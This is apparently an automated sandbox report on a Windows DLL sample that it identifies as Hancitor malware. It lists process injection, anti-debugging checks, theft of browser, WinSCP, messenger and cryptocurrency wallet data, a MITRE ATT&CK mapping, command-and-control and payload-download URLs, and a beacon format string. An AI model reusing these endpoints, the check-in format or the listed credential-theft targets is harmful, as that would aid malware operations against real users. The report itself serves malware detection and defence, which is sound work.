                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BC3668 SetUnhandledExceptionFilter,__encode_pointer,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BBE1A8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BBB328 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BB9B44 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\svchost.exe | Domain query: pospvisis.com
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 23.21.173.155 80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 77.222.42.67 80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 8.211.241.0 80
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: sudepallon.com
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: srand04rf.ru
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 23.21.224.49 80
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: api.ipify.org
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 95.213.179.67 80
Contains functionality to inject threads in other processes
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_02E53880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_04433880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 15_2_04BA3880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: rundll32.exe, 00000003.00000002.488762248.00000000034A0000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.488220121.0000000002FE0000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.488498927.0000000003790000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: rundll32.exe, 00000003.00000002.488762248.00000000034A0000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.488220121.0000000002FE0000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.488498927.0000000003790000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000003.00000002.488762248.00000000034A0000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.488220121.0000000002FE0000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.488498927.0000000003790000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: rundll32.exe, 00000003.00000002.488762248.00000000034A0000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.488220121.0000000002FE0000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.488498927.0000000003790000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_02E78BC2 cpuid
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: DialogBoxIndirectParamAorW,GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,GetMessageW,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,MonitorFromWindow,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,SetDeskWallpaper,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,CheckDlgButton,__invoke_watson,___crtGetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LcidFromHexString,GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,closesocket,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LcidFromHexString,GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LcidFromHexString,GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
Source: C:\Windows\SysWOW64\svchost.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\Documents VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Application Data VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_02E75256 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_00415800 CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,closesocket,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_02E51AA0 GetVersion,CreateWindowExA,UnregisterClassA,DdeInitializeA,CreateWindowInBand,wsprintfA,wsprintfA,
Source: C:\Windows\SysWOW64\svchost.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml

Remote Access Functionality:

Yara detected Hancitor
Source: Yara match | File source: 2.3.rundll32.exe.664392.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.664392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.rundll32.exe.4f44392.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.d14392.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.3.rundll32.exe.dd4392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.1504392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.634392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.4f4392.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.634392.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.3.rundll32.exe.dd4392.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.d14392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.2e50000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rundll32.exe.4ba0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.1504392.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.3.rundll32.exe.4ca4392.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.4f4392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.rundll32.exe.4f44392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.3.rundll32.exe.4ca4392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.4430000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.488456292.0000000004434000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.338747871.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.339351013.0000000000660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.363092172.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.488244690.0000000002E54000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.441877348.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.371171215.0000000001500000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.368759303.0000000004F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.355295800.0000000000630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.488676401.0000000004BA4000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.443699128.0000000004CA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4156, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5972, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4708, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 2988, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 3704, type: MEMORY

                  Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API1 | Create Account1 | Process Injection212 | Deobfuscate/Decode Files or Information1 | OS Credential Dumping1 | System Time Discovery2 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Obfuscated Files or Information2 | Input Capture11 | System Information Discovery55 | Remote Desktop Protocol | Data from Local System1 | Exfiltration Over Bluetooth | Encrypted Channel2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing1 | Credentials in Registry2 | Security Software Discovery21 | SMB/Windows Admin Shares | Input Capture11 | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Masquerading1 | Credentials In Files1 | Virtualization/Sandbox Evasion1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol123 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion1 | LSA Secrets | Process Discovery13 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection212 | Cached Domain Credentials | Remote System Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll321 | DCSync | System Network Configuration Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

                  Behavior Graph

Behavior Graph ID: 446231, Sample: niberius.dll, Startdate: 09/07/2021, Architecture: WINDOWS, Score: 100
Process chain shown in the graph: loaddll32.exe -> cmd.exe -> rundll32.exe -> svchost.exe; loaddll32.exe also starts further rundll32.exe instances (4 other processes).
Network nodes shown in the graph: sudepallon.com (77.222.42.67, SWEB-ASRU, Russian Federation); srand04rf.ru (8.211.241.0, CNNIC-ALIBABA-US-NET-AP, Singapore); pospvisis.com (95.213.179.67, SELECTELRU, Russian Federation); nagano-19599.herokussl.com; 23.21.224.49 (AMAZON-AESUS, United States).

                  Screenshots


                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

Source | Detection | Scanner
niberius.dll | 9% | Virustotal

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

Source | Detection | Scanner | Label
15.2.rundll32.exe.4ba0000.1.unpack | 100% | Avira | TR/Hijacker.Gen
3.2.rundll32.exe.2e50000.2.unpack | 100% | Avira | TR/Hijacker.Gen
14.2.rundll32.exe.4430000.2.unpack | 100% | Avira | TR/Hijacker.Gen

                  Domains

Source | Detection | Scanner
srand04rf.ru | 13% | Virustotal
pospvisis.com | 12% | Virustotal
sudepallon.com | 2% | Virustotal

                  URLs


                  Domains and IPs

                  Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
elb097307-934924932.us-east-1.elb.amazonaws.com | 23.21.173.155 | true | false | - | high
srand04rf.ru | 8.211.241.0 | true | true | - | unknown
pospvisis.com | 95.213.179.67 | true | true | - | unknown
sudepallon.com | 77.222.42.67 | true | true | - | unknown
api.ipify.org | unknown | unknown | false | - | high

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://srand04rf.ru/7hfjsdfjks.exe | true | Avira URL Cloud: safe | unknown
http://thentabecon.ru/8/forum.php | true | Avira URL Cloud: safe | unknown
http://api.ipify.org/ | false | - | high
http://sudepallon.com/8/forum.php | true | Avira URL Cloud: safe | unknown
http://anspossthrly.ru/8/forum.php | true | Avira URL Cloud: safe | unknown
http://api.ipify.org/?format=xml | false | - | high

                          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://sudepallon.com/8/forum.phpK | rundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://sudepallon.com/8/forum.phpeBH | rundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID | rundll32.exe, 00000002.00000003.339351013.0000000000660000.00000040.00000001.sdmp; rundll32.exe, 00000003.00000003.338747871.0000000000D10000.00000040.00000001.sdmp; rundll32.exe, 00000003.00000002.488244690.0000000002E54000.00000002.00020000.sdmp; rundll32.exe, 00000006.00000003.368759303.0000000004F40000.00000040.00000001.sdmp; rundll32.exe, 0000000E.00000002.488456292.0000000004434000.00000002.00020000.sdmp; rundll32.exe, 0000000E.00000003.441877348.0000000000DD0000.00000040.00000001.sdmp; rundll32.exe, 0000000F.00000002.488676401.0000000004BA4000.00000002.00020000.sdmp; rundll32.exe, 0000000F.00000003.443699128.0000000004CA0000.00000040.00000001.sdmp | false | Avira URL Cloud: safe | low
http://sudepallon.com/8/forum.php= | rundll32.exe, 00000003.00000002.488661456.000000000306C000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://sudepallon.com/8/forum.phppR | rundll32.exe, 00000003.00000003.470696238.0000000003076000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://sudepallon.com/8/forum.phpea | rundll32.exe, 00000003.00000002.488536012.000000000301A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://sudepallon.com/8/forum.phpT | rundll32.exe, 00000003.00000003.449636554.0000000003049000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://sudepallon.com/8/forum.php6O | rundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://api.ipify.org | rundll32.exe | false | - | high
http://sudepallon.com/8/forum.phpk | rundll32.exe, 00000003.00000003.450815474.0000000003049000.00000004.00000001.sdmp; rundll32.exe, 00000003.00000002.488695100.0000000003074000.00000004.00000020.sdmp | false | - | unknown
http://sudepallon.com/8/forum.phph | rundll32.exe, 00000003.00000003.472349437.0000000003073000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://sudepallon.com/8/forum.php& | rundll32.exe, 00000003.00000003.460449950.0000000003049000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://sudepallon.com/8/forum.phponnection: | rundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://sudepallon.com/8/forum.php.com/8/forum.php | rundll32.exe, 00000003.00000003.459490879.000000000304A000.00000004.00000001.sdmp; rundll32.exe, 00000003.00000003.450815474.0000000003049000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://sudepallon.com/8/forum.phpb | rundll32.exe, 00000003.00000003.472349437.0000000003073000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://sudepallon.com/fjsdfjks.exe | rundll32.exe, 00000003.00000003.370674723.000000000306B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://sudepallon.com/8/forum.php: | rundll32.exe, 00000003.00000003.472349437.0000000003073000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://sudepallon.com/8/forum.php8 | rundll32.exe, 00000003.00000003.472349437.0000000003073000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
